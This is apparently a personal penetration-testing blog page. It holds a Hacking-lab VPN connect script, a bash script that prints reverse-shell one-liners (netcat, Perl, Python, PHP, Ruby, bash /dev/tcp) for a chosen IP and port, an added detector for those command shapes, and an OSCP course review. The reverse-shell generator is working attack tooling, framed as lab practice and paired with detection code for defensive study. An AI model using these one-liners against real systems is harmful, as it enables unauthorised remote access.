Hacking-lab.com VPN connect for Kali, BackTrack [bash]

Hacking-lab.com has some really awesome challenges which I am working my way through.

Register at https://www.hacking-lab.com/user/register/ if you have not done so.

The connect script on the site was pretty good, but I decided to make a more portable version. It checks whether the config files exist and, if not, downloads all of them. It runs OpenVPN in a new window, then launches the events page, the website page with all the challenges. It forks a new process so that resolv.conf keeps being copied; on key press the child process is killed and the old config is restored.

#!/bin/bash
# Run as root: the script rewrites /etc/resolv.conf and starts openvpn.
echo "$(tput setaf 2)Welcome to Hacking labs btr5 connect script by dwinfrey v1.1"
# Download the config files only if any of them is missing.
if [[ -e resolv.conf.hacking-lab && -e client.ovpn && -e hlca.crt ]]
then
echo "All config files exist"
else
echo "$(tput setaf 1)Error, config files missing, Downloading config files"
# Note: these are fetched over plain HTTP, so nothing authenticates them.
wget http://media.hacking-lab.com/largefiles/livecd/z_openvpn_config/backtrack/resolv.conf.hacking-lab
wget http://media.hacking-lab.com/largefiles/livecd/z_openvpn_config/backtrack/client.ovpn
wget http://media.hacking-lab.com/largefiles/livecd/z_openvpn_config/backtrack/hlca.crt
fi
echo "$(tput setaf 2)OpenVPN connection window will open"
echo "Login using your email/password"
gnome-terminal -x openvpn client.ovpn
read -p "Press Enter when successfully connected"
# Back up the current resolver config, then switch to the lab's DNS settings.
mv /etc/resolv.conf /etc/resolv.conf.back
cp resolv.conf.hacking-lab /etc/resolv.conf
echo "Your resolv.conf has been backed up and new config copied"
echo "Opening Events page"
firefox https://www.hacking-lab.com/events/ &
# Re-copy the lab resolv.conf every 60 seconds so the lab DNS settings stay in place.
keep_copying(){
while true; do
	cp resolv.conf.hacking-lab /etc/resolv.conf
	sleep 60
done
}
keep_copying & pid_copy=$!
read -p "Press Enter when you wish to disconnect"
killall openvpn
kill "$pid_copy"
# Restore the original resolver config.
mv /etc/resolv.conf.back /etc/resolv.conf
echo "Resolv.conf restored, Goodbye"
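
The script above downloads client.ovpn and hlca.crt over plain HTTP and then hands them to OpenVPN running as root, and it only restores resolv.conf if it reaches its last lines. The following is an added example, not part of the original script: it checks a file against a pinned SHA-256, lists OpenVPN directives that can execute programs, and makes the resolv.conf swap reversible. The function names and the PINNED_CA placeholder are assumptions.

```bash
#!/bin/bash
# Added example: vet the downloaded VPN files and make the resolv.conf swap
# reversible. Function names and the pinned hash are assumptions.

# True only if FILE's SHA-256 equals a value recorded from a trusted copy.
verify_pinned() {
    local actual
    actual=$(sha256sum "$1" 2>/dev/null | cut -d' ' -f1)
    [ -n "$actual" ] && [ "$actual" = "$2" ]
}

# Print (with line numbers) every directive in an OpenVPN config that lets
# the client run external programs or load a plugin; return 1 if any exists.
audit_ovpn() {
    local hits
    hits=$(grep -nE '^[[:space:]]*(script-security|up|down|route-up|route-pre-down|ipchange|tls-verify|plugin)([[:space:]]|$)' "$1" || true)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Install NEW_CONF as TARGET (default /etc/resolv.conf), keeping a backup.
swap_resolv() {
    local target=${2:-/etc/resolv.conf}
    cp -p "$target" "$target.back" && cp "$1" "$target"
}

# Put the backup back if one exists; safe to call more than once.
restore_resolv() {
    local target=${1:-/etc/resolv.conf}
    if [ -e "$target.back" ]; then mv "$target.back" "$target"; fi
}

# Intended use inside the connect script (PINNED_CA is a placeholder):
#   verify_pinned hlca.crt "$PINNED_CA" || exit 1
#   audit_ovpn client.ovpn || exit 1
#   swap_resolv resolv.conf.hacking-lab
#   trap restore_resolv EXIT INT TERM
```

With the trap in place, the original resolver config comes back even when the script is interrupted before its final lines.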

Reverse shell One-liners all in one bash script

This small script uses the reverse shells from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

The script will print out all the different one liners for reverse shells using different programming languages.  If no port number is given, it will default to 443.


#!/bin/bash
# v1 one-liner-reverse-shells
# One liners source http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
IP=$1 # assigning variables
PORT=$2

# Validating input
if [ $# -eq 1 ]; then
PORT=443 # set Default port
elif [ $# -gt 2 -o $# -lt 1 ]; then
echo -e "Usage: $0 IP PORT, If no port is given default is set to 443"
exit 1
fi

echo "$(tput setaf 1)Netcat Listener: nc -lvp $PORT"
echo "Netcat : nc -e /bin/sh $IP $PORT"
echo $'\n'$(tput setaf 4)
echo 'Perl: perl -e '\''use Socket;$i="'$IP'";$p='$PORT';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'\'''
echo $'\n'$(tput setaf 2)
echo 'Python: python -c '\''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'$IP'",'$PORT'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'\'''
echo $'\n'$(tput setaf 4)
echo 'PHP: php -r '\''$sock=fsockopen("'$IP'",'$PORT');exec("/bin/sh -i <&3 >&3 2>&3");'\'''
echo $'\n'$(tput setaf 1)
echo 'Ruby: ruby -rsocket -e'\''f=TCPSocket.open("'$IP'",'$PORT').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'\'''
echo $'\n'$(tput setaf 7)
echo 'Bash: bash -i >& /dev/tcp/'$IP'/'$PORT' 0>&1'

Comments and suggestions welcome 🙂
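
The one-liners above have recognisable shapes in process command lines, which is what a defender sees in `ps -eo args` output or process-creation logs. The following is an added example, not part of the original post: it labels command lines that match those shapes. The labels, patterns, function names and sample lines are assumptions constructed for illustration.

```bash
#!/bin/bash
# Added example: label command lines that have the shape of the one-liners
# printed by the script above. Labels and patterns are assumptions.

# Reads one command line per row on stdin, prints "<label>: <line>" per hit.
detect_revshell() {
    local line
    while IFS= read -r line; do
        case $line in
            *"nc -e /bin/"*)            echo "netcat-exec: $line" ;;
            *"/dev/tcp/"*)              echo "bash-dev-tcp: $line" ;;
            *perl*"use Socket"*exec*)   echo "perl-socket-exec: $line" ;;
            *python*socket*dup2*)       echo "python-socket-dup2: $line" ;;
            *php*fsockopen*exec*)       echo "php-fsockopen-exec: $line" ;;
            *ruby*TCPSocket*exec*)      echo "ruby-tcpsocket-exec: $line" ;;
        esac
    done
}

# Constructed sample: three non-matching commands and three matches
# (192.0.2.10 is a documentation address).
sample_cmdlines() {
    cat <<'EOF'
nc -lvp 443
nc -e /bin/sh 192.0.2.10 443
bash -i >& /dev/tcp/192.0.2.10/443 0>&1
python -c import socket;print(socket.gethostname())
php -r $sock=fsockopen("192.0.2.10",443);exec("/bin/sh -i <&3 >&3 2>&3");
curl -s https://example.test/health
EOF
}

# Count hits per label, most frequent first.
summarise() { detect_revshell | cut -d: -f1 | sort | uniq -c | sort -rn; }

sample_cmdlines | detect_revshell
```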

 

 

Penetration Testing with BackTrack review / OSCP

I really enjoyed the course. The labs have 50 computers, each with a different way in. The main reason for choosing Penetration Testing with BackTrack over CEH is that CEH is all theory, which can get really boring, and I learn much better by doing than by reading a textbook and watching a few videos.

The course is also good because it gives you around 40% of the material and then the other 60% is all down to you to research and find out. This may seem like a bad point, but really it's the course's big benefit because it makes you do your own research and solve the problems by yourself.

I managed to get into 46 of 50 lab machines, which I was pleased about. The course has also given me confidence to not be afraid of failing… you get used to failing in the labs and you just have to keep trying.
I made the error of downloading and running an exploit without using my own shellcode, which rm'd my hard drive... goodbye lab notes. So I had to restart from nothing again after 30 days. This was in some ways good, as it meant I had a refresher on all modules. After that I decided to keep all my notes inside Windows using KeepNote, and a backup of my VM daily.

My favourite part of the course was the exam: 24hrs of pressured hacking. I managed to get 2hrs sleep, eat three pizzas and pass the exam. I cannot go into any detail about the exam apart from that you will enjoy it if you enjoyed the labs 😀